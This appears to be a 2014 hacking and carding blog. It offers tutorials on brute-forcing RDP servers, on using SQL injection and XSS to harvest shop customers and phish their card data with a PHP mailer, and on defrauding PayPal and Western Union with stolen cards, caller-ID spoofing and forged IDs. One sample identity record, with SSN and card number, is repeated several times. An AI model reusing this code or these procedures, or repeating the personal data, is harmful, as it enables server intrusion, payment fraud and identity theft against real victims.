Tuesday, June 17, 2014

How to use Duchecker to Crack RDP

If you are looking for help or suggestion about VPS cracker or scanner, please go in this topic

VPS Scanner & Cracker ~~ Help | Suggestion

if you want to post new prog related to VPS cracker or scanner, post that in new topic for further check and i will move your post in this topic.


updated version of DUBrute 2.0, this time without the RC.

[+] Brutus grandparents with win2008. During the tests are not met, butalso a theoretical brute Vista and Seven.

[+] Maybe brute logins and passwords in any language using a unicode source, source to support a particular language must be created on the computer on which there is support for this language. That is to create aunicode source with the Cyrillic alphabet to his grandfather, who sozdvatto support it, you can use this source for any grandfather. Also, if yourgrandfather or supports any language just do not have to create a unicode source. That is, if my grandfather national fonts that they can brute Cyrilliccreating common source as before. This feature is poorly tested soVariations bugs.

[+] Improved stability and decrease the number of departures.

[-] Because of the possibility of brute win2008 grandparents with increasedtraffic on a test login; password in connection with which there may be some slight decrease in speed. If you have any bugs or flaws critical writinghere.






DUChecker V1.0

[+] Multi-threading.

[+] Ability to check the speed on different servers. For example, the rate of grandparents in the U.S., you can check with the U.S. servers, and the speed of European grandparents with servers from Europe.
[+] The program is completely free.

[-] A small percentage of the check. No checks, most grandparents WinXP(not applicable to XP Service Pack 3). Some Win2003 no checks.

Run is not difficult to choose the menu open, open any valid list ofgrandparents in the format ip @ login; password. Then you can eitherchoose to manually check for grandparents or just choose threads and click on the large green triangle.






FTP & NT Scanner by Lomax

do not change the ''user'' and ''pass'' to any extention.

if have to modified data for user and password.

do like following

select notepad to open

change the data as you want and save file.

example to use prog:

open 'scan.exe' in the folder.






Tuesday, May 20, 2014

How to hack into a VPS or RDP

Today we will be explaining how to hack into an RDP and/or VPS.
Tools you will need
VNC Scanner GUI

Tools recommended
I have tried and tested many RDP cracking software and these have had the best outcomes.
VNC Scanner: For it's amazing speed. (Please note it only scans ip ranges)
DUBrute 2.2: For its amazing stability.
I don't recommend to buy a Bruter, I have bought BruterX for $25 and they are not very stable and don't work on all OS. DUBrute is your best bet.

Before we start let me tell you the easiest RDP's to crack are the Brazilian ones.

First you will have to install Nmap and then run the scanner.bat. Wait till you get 30 ip's which should take roughly 10 minutes and go to this site:
Input a max of 30 ips and it will tell you the location of all of them. Choose one that suits what country your looking for.
Now that you have found an ip with your desired country, open VNC Scanner GUI.
Say if your ip is, input it into VNC Scanner like this and click start.
Once you have found a decent amount of ips, recommended 1-5k close the .bat and click Start Parser.
Now if you open your VNC Scanner folder up you will see a .txt called IPs.
Open it up and you got your ip's with port 3389 open. (Default port for RDP's)
Now your ready to start BruteForcing them. :)
Open DUBrute 2.2 and click config and make sure it looks like mine. Change the thread depending to your internet connection. (I used 350 thread ~ 300+ download and upload speed for my internet)
So I'd recommend 50 thread for the average internet.
Now click Generation and insert your ip's, usernames and passwords and click Make.
Now exit the Generation and click start. Like I said try Brazilian IP's as they have the most success rate. I personally crack over 30 RDP's a day, and now you can too.

Tuesday, May 13, 2014

Getting Private CC's Through SQL Injection

This is a method for getting fresh CC info, sent directly to an inbox of your choosing!

First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<script language=javascript>
function submitPostLink()

Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.

Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....
PHP Code:
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";

$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use bit.ly, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up. Enjoy!!!

How to Card Paypal Easily and Make Lots of Money

PayPal Tutorial (Still working)
I've personally tested this many times with EU cc's and EU paypal's account. It would have to work also for US, but I do not guarantee the operation to 100%.


- Cc's with good balance: you need only #, cvv and exp date;
- 3 Paypal's account (A & B & C);
- Vcc;
- Paypal Mastercard or bank account (optional)


- 8$ for vcc i think
- 10-14$ for each CC's;
- XXX each Paypal Mastercard. (don't know how much it costs in your country).


- 45 minuts -1hr


- Verify all paypals with vcc's (3 vcc's), the 3rd account can also be a legit account
- Make your account (A) PREMIER;
- Make your account (B) PREMIER;
- Make an unpaid invoice from Paypal (A) to a new e-mail address (I suggest an unknown email service: @gawab.com or @mail.com);
- Pay the invoice with your EU cc (make sure you use good socks and go through everything like your carding something);
- once the invoice is paid, go back onto PayPal (A) and send the mo
- Then transfer INSTANTLY all the money from (B) Paypal to © Paypal;
- close the other 2 paypals, or just close the second one.
- Request withdrawn on paypal © to your bank account or to your paypal mastercard (and if you have paypal mastercard, wait for 24hr and go on atm.)


All paypal's account have withdrawn limit (1000EUR per day) and transaction limit (2500EUR per year). The last one limit can be fucked, sending a scan of documents and billing (this process can take 5-10 days). It's better that you remove this limit BEFORE operate in (B) Paypal (but this is entirely optional). If you want you can also request withdrawn with IBAN transfer, because Paypal Mastercard permitted this. In this way you don't have the annoying limit of withdrawn of money (1000EUR per day), but it takes around 2-3 days. Remember to use different socks when you login into the two accounts. Then...if you do not have Paypal Card, you can try this with other credit card.


Guide to Carding for Noobs

Ok, so I decided to create this guide for people out there who are struggling to get carded goods shipped. Too many people out there don't share info to people starting off that could be shared without hurting themselves or keeping their own methods fresh. So here goes:

What you need:
The most important thing is obviously the credit card. You can get these many places, but the quality of them will vary from where you buy them or how you get them. Another thing you need is a proxy or way to hide your IP address. This is pretty basic for most. You need this to prevent people from tracing you. There are different types (VPN, SOCKS, RDP). Last thing you need is a drop or place to ship the carded item. You can find this yourself or find someone you can trust to receive the package for you and ship to you or sell it for you.

There are shops and hackers, and of course the ABH dump and other non-private ways of getting cards. The kind of card you want if you want to card anything of real resell value (Electronics, jewlery, etc) is a Live and Private card. This means that the card is valid and no other carder has used it besides you. Some shops are good, but others aren't. Same with Hackers. Hackers can get cards by Spamming or hacking db's. Hacked cards are better imo because spammed cards have a tendency to have incorrect billing information. Shop around and try not to get ripped

Proxies/Hiding Your IP:
There are a few different types of Proxies or methods good for carding. My preference is the SOCKS5 Proxy. It is an absolutely secure proxy that hides your DNS as well and many clients will allow you to conveniently choose a location you want your IP address to refelct, which is necessary to do if you want to card the most secure sites. RDP's work good for people that are in smaller countries. These allow you to control a remote computer, so you basically see the desktop of another computer and your IP is changed. And VPN's are secure for your IP, but easily detected by websites, so many sites won't let your card info go though if you're using a VPN.

A drop is somewhere that you can ship your goods to without being traced. You can make friends with a person working for a shipper and have them deliver all the goods you tell them to you. Or you can a house that no one is occupying if you're in a big city or town and have goods shipped there. Also, you can use PO boxes with fake names. There are many ways. Be creative, but don't ship to your house...

How to card:
Carding is basically as easy as putting the card information into a website's checkout, but there are many ways that you can be stopped from getting your goods by these sites' security. Many sites check your IP address. If it is blacklisted or it has been recorded by them as being used for fraud they will block your purchase from going through and also kill your card (putting a block on it from the bank). So make sure you use a fresh and private SOCKS or good RDP. VPN's will most likely be blacklisted, but there are always sites that don't check IP address, so it's up to you to figure out the security of each site and what works from site to site. Some sites require that all billing information be correct (including phone number), while some only require zip code, and others may just require card number and expiration date (You can order pizza like this ). Every site is different, but gradually more sites are stepping up their security, so you have to stay ahead. Also, the most secure sites use phone verification. This means they need you to call them from the billing address phone number or answer a voicemail and receive a code from that number. Watch out for these sites. They are tough to crack (example = Tigerdirect for expensive orders). Some sites will only call you or require this if the info is incorrect, so you can avoid alot of problems by just having good cards and having the correct information. Other sites, like Amazon, will have a team looking for signs of fraudulant activity. This means that if you create a new account and right away buy something like an iPhone they might get bank to verify the purchase, which will cause the card to die. So, for some sites you even have to try to act like a real customer to get your goods past. Bottom line is you have to figure out the security of the sites you want to get goods from so you can know how to use your card and for how much you should charge.

How to Card Western Union and Make Transfers from CVV

Hi guys,

For those of you that ask why I don't do western wu transfers, this post is for you. I do western transfers but I pick them up personally, I don't offer wu transfer service. Below is a screen shot of my recent transfer and the whole tutorials of how I did it below. Enjoy

How to card Western Union Tutorial
You need main things to card Western Union !

1) Fresh credit card or fullz contain dob ssn and mmn and other things

This is the example of fullz

First Name : BARBARA
Middle Name : L.
Last Name : MILLS
Spouse Name :
Father Name :
Billing Address : 26 MAIN ST.
State : MA
Zip Code : 01235
Country : US
Phone Number : 413-685-8195
Credit Card Information :
Card Type : Credit
Credit Card Number : 429470193003831
Exp. Date :
Cvv2 : 677
Mother Maiden Name : WALTON
Social Security Number : 028-42-4621
Birth Day : 20
Birth Month : 04
Birth Year : 1950
Account Information :
Password : ECHO555 Nothing

2) Socks , Proxy

You can get tons of proxy via google.com or i am listing some website to get free proxy and socks

Hide My Ass! Free Proxy and Privacy Tools - Surf The Web Anonymously
Free Proxy Lists
Anonymizer: free web proxy, CGI proxy list, free anonymizers and the list of web anonymizers list

3) RDP

You can get easily or socks is better

Now tutorial Start from here

This Tutorial is worldwide :

Suppose I Live In India And Wanted To Send Money To Some Other Country!!

So Lets Start Find A USA Or, UK CC !!

Suppose You got the card And here is the card

Card Type : Credit
Credit Card Number : 4294701930038344
Exp. Date : 1/January / 2012
Cvv2 : 677

This Bins Bank Name is

Greylock F.C.U. CREDIT CLASSIC USA Pittsfield Massachusetts MA

You can get more info via google.com

Or here is website
BIN Checker: Bank Identification Number (BIN checker, BIN check, BIN base, BIN lookup, BIN search, BIN find, BIN list, BIN database, check BIN, card search, card check, card find)

Now Which Bank Is good and which card is Best to card this is the main question so i'll tell yOu !

1) Usa Chase bank
2) Usa other banks such as Boa and so on
3) lloyd
4) france bank or so on

Now Where do u get the cc and fullz Sometime You can get easily from me and some time not

Now First Change Proxy and socks From the card u get

Suppose you get the card Of USA Bank Then state is Canada So find the canada socks and change your proxy

Q ) How To change proxy ?
A) Web browser instructions

Mozilla Firefox: Tools > Options > Advanced > Settings > Manual proxy configuration.
Google Chrome: Options > Under the hood > Network > Change proxy settings > LAN settings > Use a proxy server > Advanced > HTTP.
Internet Explorer: Tools > Internet options > Connections > LAN settings > Use a proxy server > Advanced > HTTP.
Opera: Tools > Preferences > Advanced > Network.

Now You change the proxy Now Open
Money Transfer | Western Union
and the website will locate your proxy and open the Usa page for you automatically if not then please choose USA

On right side They'll ask you Send from zip code so choose the zip code you get on the cc example this

First Name : BARBARA
Middle Name : L.
Last Name : MILLS
Spouse Name :
Father Name :
Billing Address : 26 MAIN ST.
State : MA
Zip Code : 01235
Country : US
Phone Number : 413-685-8195

Zip code = 01235 Is the card zip code put this and amount you want to send Try lower first choose 100
and then select your country i.e Send to country Put your's

Next page will open and they'll ask you the following option

Online > > > Credit card > > Minute to minute >> Pay to agent

Choose Online then choose credit card and minute to minute

They'll tell u estimated fee's

Now come's handy part i.e

The registration Proces's

Now fill the form

Firstname lastname address phone number city state country must be the same as u got in ur card

First Name : BARBARA
Middle Name : L.
Last Name : MILLS
Spouse Name :
Father Name :
Billing Address : 26 MAIN ST.
State : MA
Zip Code : 01235
Country : US
Phone Number : 413-685-8195

Put the same thing in registration form Once you complete they'll ask you to register via email id

So put ur email id then username and password
Click continue

next part is the reciever Name and country state

So put country state and name and press continue

And press continue

Now put security question and answer and continue

You will get following confirmation message or preview detail of Your's page of registration if you satisfy then choose Okay and confirm if this is well okay

You will get message !

Congratulation Mr....

Here is your Mtcn which is ready minute to minute

Mtcn consist of 10 digit always ! So congratez if u get this

If you Find error Such as western union will verify you via phone call service or via ID Card

Then You're still in luck 3 things needed

1) Complete backgroung of card holder's
2) call spoofer and forwarding
3) ip phone system / voice changer

1. A complete Background Check of the card holder

This is because if you are going to try and transfer anything over $100 dollars USD they will ask you various questions such as your previous address, Social security number, Date of birth, Mothers maiden name, what your middle name is, what bank issued you your credit card, etc. In order to get that kind of infomation you will need to go to a site like pipl.com and it free for the infomation you might need for western union. if you have fullz you'll tell then your fullz detail

First Name : BARBARA
Middle Name : L.
Last Name : MILLS
Spouse Name :
Father Name :
Billing Address : 26 MAIN ST.
State : MA
Zip Code : 01235
Country : US
Phone Number : 413-685-8195
Credit Card Information :
Card Type : Credit
Credit Card Number : 4294701930038344
Exp. Date : 1/January / 2012
Cvv2 : 677
Mother Maiden Name : WALTON
Social Security Number : 028-42-4621
Birth Day : 20
Birth Month : 04
Birth Year : 1950
Account Information :
Password : ECHO555 Nothing

2. Phone spoofer/voice changer

You will need this because western union will think you are a fraudster if you arent calling from the card holders phone number so you must use a phone spoofer service to make the caller id at western union come up with the card holders phone number. Basically trick western union into thinking your calling from the card holders house. The voice changer comes with the phone spoofer service and you need this obviously so your own voice isnt being recorded incase of an investication and also if your a male and your using a females cc to get money from wu you will want to change your voice to sound like a female.

3. Call fowarding service

This is something you will need because the phone spoofing service blocks 1800 numbers or any toll free phone number. You can only dial 10 digit numbers with phone spoofers so you have to get a call fowarding service so when you call the 10 digit number from the call forwarding service it will foward to western union. I will provide you here some link free

4. Internet phone service

If you are located in europe this is a must because it will cost you too much to use the spoofer and call fowarding service and it is also not traceable.

I am providing some Link's here

Call forwarding links And Virtual Number Link's:

Free Call Forwarding
Virtual Phone Numbers, Call forwarding, http://www.JetNumbers.com

Phone Spoofer / Voice Changer Links :

Telespoof.com - Caller ID Spoofing Service
Free Spoof Caller ID, Free Fake phone number, Change your Caller ID
Fake Caller ID
Free Caller ID Spoofing - Free Call Spoof - SpoofTel
PhoneGangster.com - Anonymous Caller ID Spoofing Cards
Mobile Apps - SpoofCard

You can call via skype or anything

If your card Phone Number : 413-685-8195 Is this then forward to your number once u forward WU Will call to Phone Number : 413-685-8195 and you will recieved in your

Next step to by pass the Id card

Google .com and download FREE PSD FOR CREDIT CARD and edit it via photoshop

If WU Redirect you to bank website then don't worry put secure code and its by pass !
Once you done u will reiceved mtcn no

And You Done !!

Ravan , JavaScript based Distributed Password cracking

You want to crack a hash but your system speed is low?! No need to worry..! Here is solution for you , "Distributed Password Cracking". Let me introduce a new tool called "Ravan" developed by LavaKumar.
About Ravan:
Ravan is a JavaScript based Distributed Computing system that can perform brute force attacks on salted hashes by distributing the task across several browsers. It makes use of HTML5 WebWorkers to start background JavaScript threads in the browsers of the workers, each worker computes a part of the hash cracking activity.
Ravan now supports MD5,SHA1,SHA256,SHA512 hashes.

How it works?
Ravan has three components:

The hash, salt, hashing algorithm, position of the salt (before or after salt) and the charset are submitted by the user. These are submitted to the web backend and it returns a ‘hash id’ which is unique to every submitted hash. It also supplies a ‘worker url’ specific to this hash that must be sent to potential workers.
Once the hash is submitted the master creates arrays of slots (each array contains 5 slots), this is submitted to the web backend. Each slot represents a small part of the keyspace, this is how the entire activity is broken down in to multiple tiny tasks. A single slot represents 1 million combinations.
The master constantly polls the web backend to check on the progress of the cracking process. As the existing list of slots is completed by the workers the master allots more slots. When a worker cracks the hash and returns the clear-text value the master confirm this and then signals all workers to stop cracking.

Web Backend:
The web backend acts as a proxy between the master and the workers. It does not perform any actual computation but validates the data submitted by both the parties and passes information between them.

The worker performs the actual hard work of cracking the hashes. Each hash has a unique worker URL and this page explicitly asks for the user permission before the cracking process is started. Once the user accepts and clicks ‘Start’ the worker polls the web backend for available slots, the web backend returns an array of slots from its database. The worker cracks each slot and sends the result to the web backend. After completing all the slots it polls the web backend for more slots.

Here is the tool: